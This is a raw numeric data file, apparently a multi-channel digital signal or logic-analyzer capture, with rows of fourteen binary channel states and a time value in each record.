0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023300e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023324e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023348e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023372e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023396e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023424e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023448e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023548e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023572e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9023972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9023996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9024972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9024996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9025972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9025996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9026972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9026996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9027024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9027044e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9027052e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9151740e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9151960e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,2.9151980e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9152000e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,2.9152324e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.9152352e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9152356e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9152376e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9152404e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9152428e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9152452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9152476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9152500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.9152524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.9152552e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152576e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152604e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152628e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152752e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152804e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152828e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9152832e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9152876e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9152900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152908e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9152952e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9152976e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153004e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153028e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153152e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153176e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153204e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153228e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153352e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153376e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9153404e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9153452e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9153476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153552e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153576e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153604e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153628e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153752e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153776e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153804e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153828e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9153952e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9153976e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154004e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154028e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154152e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154156e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154176e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154204e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154228e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154252e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154276e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154300e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154324e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154352e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154376e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154404e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9154452e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9154476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154552e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154576e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154604e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154628e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154752e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154776e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154804e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154828e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154852e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9154952e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9154976e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155004e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155028e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155052e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155076e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155124e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155152e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155176e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155204e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155228e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155252e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155276e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155324e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155380e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9155404e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.9155452e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.9155476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155552e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155576e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155604e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155628e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155752e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155776e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155804e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155828e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155852e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9155952e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9155976e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156004e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156028e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156152e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156176e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156204e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156228e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156352e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156376e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156404e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156428e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156552e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156576e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156604e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156628e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156752e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156776e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156804e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156828e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9156952e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9156976e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157004e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157028e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157152e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157176e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157204e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157228e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157352e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157376e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157404e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157428e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157552e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157576e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157604e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157628e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157752e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157776e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157804e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157828e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9157952e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9157976e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158004e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158028e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158152e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158176e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158204e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158228e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158352e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158376e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158404e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158428e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.9158524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.9158552e-02 